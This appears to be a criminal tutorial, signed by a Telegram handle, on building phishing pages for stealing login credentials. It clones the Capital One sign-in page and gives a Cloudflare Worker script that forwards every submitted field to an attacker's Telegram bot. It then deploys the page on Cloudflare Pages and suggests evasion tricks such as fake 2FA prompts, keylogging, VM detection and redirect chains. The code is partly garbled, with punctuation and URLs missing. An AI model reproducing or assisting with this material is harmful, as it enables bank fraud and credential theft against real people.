Create Any Scampage / Phisher From Scratch


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Create Any Scampage/Phisher From Scratch (+ Your Own Telegram Bot)

One thing thats genuinely baffling is seeing how many newbies in this game actually buy scampages from randoms on Telegram. Thats just dumb. Its a waste of money plain and simple. Plus its not a long-term strategy. Websites update their designs faster than a crackhead changes moods making your purchased scampage obsolete after a couple of months. Suddenly youre holding cyberspace garbage—victims will smell the bullshit from a mile away and wont input jack shit.

Thats why this guide exists. Im going to show you how to create your own phishers and scampages. Its not rocket science and its way more practical than throwing your cash at some retarded seller. So pay attention and lets get this done.

Anatomy of a Phisher

Before we dive deep into creating your own phisher you need to understand what makes these things work. A phisher is essentially split into two critical components—think of it like a digital mullet: business in the front party in the back.

Anatomy of a Phisher.png

Frontend (The Pretty Face):

This is what your marks actually see—the login page input fields logos and all that eye candy. Its a carbon copy of the legitimate site youre targeting right down to the favicon. The frontend needs to be pixel-perfect because humans are surprisingly good at spotting when somethings off even if they cant explain why. One misaligned button or wrong font and your conversion rate (the number of people who actually input their info) goes to shit.

Backend (The Money Maker):

This is where the magic happens. Instead of storing data in a database were going to use a Cloudflare Worker to capture form submissions and fire them off directly to your Telegram using a bot. Every time someone submits their creds youll get an instant alert on Telegram. Its simple and cost-effective and keeps you in the loop in real time.

The beauty of understanding these two components is that you can mix and match them like building blocks. Once you master creating both parts you can adapt to any target site fast. Hell you can even run multiple frontends—different banks email providers whatever—all feeding into a single backend. Its efficient as fuck and lets you scale your operation without rebuilding everything from scratch. And thats exactly what were going to learn.

Crafting the Frontend

Time to get our hands dirty and build the pretty face—the frontend. For this demo were gonna clone CapitalOne. Why CapitalOne? Because banks are mostly what you will be using these phishers for and the CapitalOne login page is a perfect place to start practicing your skills. Dont worry once you nail this you can rip off any site you want—banks e-commerce you name it.

Basics of a Phishing Frontend.png

Step 1: Stealing CapitalOne Face

Remember we aint coding this shit from scratch like some script kiddie. Were digital bandits not web developers. Go snag that Chrome extension called "SingleFile". This little gem lets you yoink an entire webpage—HTML CSS images the whole damn enchilada—into one tidy HTML file. Its like ripping off a band-aid but for websites.

Single File.png

Step 2: Snag the Login Page

Head over to CapitalOne secure shopping page: Capital One Sign In: Log in to access your account(s). Yeah thats the one. Click that SingleFile extension icon in your browser. Boom. Just like that you downloaded the whole damn page.

Step 3: Rename and Save

Rename that freshly ripped off file to `index.html`. Its the first page they look for when you open a website. Save it somewhere you can actually find it later like your desktop—unless your desktop is already a digital wasteland of porn and malware in which case good luck finding shit.

Step 4: Quick n Dirty Edit (For Now)

Crack open that `index.html` file in a text editor like VS Code Sublime Text or Notepad++. We need to make sure this frontend actually works before getting fancy with the backend.

Pop it open in your browser first—does it look like the real CapitalOne login page? If not you fucked up the SingleFile step. Go back and try again until it looks legit.

Capital One.png

Now for a quick test setup. Head to and grab a webhook URL—thisll be our temporary data catcher. Find the `<form>` tag in your HTML and change its `action` attribute to your webhook URL. This makes form submissions go to instead of CapitalOne's servers.

Next find the username and password input fields (theyll be `<input>` tags). Add `name="username"` to the username field and `name="password"` to the password field. These tells the browser to pass the data. Different sites use different names so youll need to adjust this for each target. But they all use more often than not a single form element.


Thats it for testing. Open your page enter some fake login details and hit submit. If the data shows up on your frontend is working. If not double-check your edits and try again. Once its working youre ready to set up a real backend.

Setting up the Backend

Now for the brains of the operation—the backend. Instead of using a database were using Cloudflare Workers to instantly forward captured credentials to your Telegram account via a bo script. This is not only cost-effective but also gives you immediate alerts whenever someone submits their info.

Setting up a Phishing Backend.png

Step 1: Cloudflare Account (Duh)


Get your ass over to Cloudflare and create a free account. This aint optional. Were using Cloudflare for everything—the backend and the frontend. You need to set it up before you can start cooking. So get to it.

Step 2: Set Up Your Telegram Bot


First create your Telegram bot by messaging @BotFather on Telegram. Type `/newbot` and follow his prompts to name your bot. BotFather will spit out an API token that looks like this: `63xxxxxx71:AAFoxxxxn0hwA-2TVSxxxNf4c`. Save this shit—youll need it.

Now for your chat ID. Heres how to get it:

code 2.png

  • Search for your new bot in Telegram and send it a message (just "/start" works)
  • Take your bot token and plug it into this URL:
    (Replace {YOUR_BOT_TOKEN} with the actual token keeping "bot" in front)
  • Open that URL in your browser. Youll see a JSON response with your chat details. Look for `"chat": {"id": 21xxxxx38}` - that number is your chat ID.

To verify everythings working:
  • Try sending a test message by visiting:
  • Check if you see the message "test123" pop up in your bot chat youre golden. If not double-check your token and chat ID.

Step 3: Cloudflare Worker Time

Cloudflare Workers.png

Now go to "Workers" in your Cloudflare dashboard and create a new Worker. Cloudflare provides an online code editor. Don't panic—were not writing a novel here. Paste the following code into your Worker:

addEventListener(fetch event => {



async function handleRequest(request) {

  if (request.method === POST) {

    const formData = await request.formData();

    let message = "New phisher data received:\n";

    for (const [key value] of formData.entries()) {

      message += `${key}: ${value}\n`;


    const botToken = YOUR_TELEGRAM_BOT_TOKEN; // Replace with your Telegram bot token

    const chatId = YOUR_CHAT_ID; // Replace with your Telegram chat ID

    const telegramUrl = `${botToken}/sendMessage`;

    await fetch(telegramUrl {

      method: POST

      headers: { Content-Type: application/json }

      body: JSON.stringify({

        chat_id: chatId

        text: message



    return Response.redirect( 302);

  } else {

    return Response.redirect( 302);



Step 4: Test Your Cloudflare Worker

Now its time to test your new backend. First go back to your scampages HTML form and replace the URL with your Cloudflare Worker URL (it should look something like "").

Once thats done test the full flow:
  • Open your scampage with Chrome
  • Fill in some fake credentials
  • Hit submit

If everything is set up correctly you should receive a Telegram message with those test credentials.

Step 5: Deploy Your Scampage


Now for the final piece - getting your phisher live on Cloudflare Pages. This gives you a slick professional-looking domain and worldwide CDN distribution.
  • Head to the Pages section of your Cloudflare dashboard
  • Click "Create a project"
  • Choose "Direct Upload"
  • Either:
    - Create a ZIP file containing just your index.html
    - Or create an empty folder put your index.html inside it
  • Drag and drop your file/folder into the upload area
  • Give your project a name (this will be part of your URL)
  • Hit Deploy


Within seconds Cloudflare will provision your phisher at `` serving it over HTTPS to look legit as fuck. Your victims won't see any sketchy redirects or SSL warnings - just a clean professional-looking page served directly from Cloudflare's infrastructure. And since it's running on legitimate Cloudflare infrastructure it'll slip right past most basic security scanners. But remember this is just the foundation - there's a whole world of advanced techniques and optimizations waiting for you to explore.


This guide barely scratches the surface of whats possible with modern phishing infrastructure. Yeah the initial setup might make your brain hurt - wrestling with HTML forms figuring out Cloudflares dashboard and debugging Telegram bots isnt exactly a walk in the park. But once youve got the basics down? This shit becomes muscle memory.

Theres a whole world of optimizations waiting for you. Grab some aged domains with clean reputations. Set up proper parsing to extract exactly the data you need. Add JavaScript to collect browser fingerprints implement fake 2FA/OTP prompts capture autofill data and record keystrokes. Add validation to filter out garbage submissions and detect VMs/security tools. Encrypt the content of the HTML served and use redirect chains so as to prevent automated blacklisting. The possibilities are endless and thats what makes this craft both challenging and rewarding.


Remember though - a phishing page is only as good as its weakest link. You can have the slickest setup in the world but if your HTML looks like it was coded by a drunk monkey or if your domain screams "TOTALLY-LEGIT-BANK-SECURE-LOGIN.TK" youre just wasting your time. Take pride in your craft pay attention to the details and never stop learning. Now get out there and build something beautiful.

(c) Telegram: d0ctrine
Our Telegram chat: BinX Labs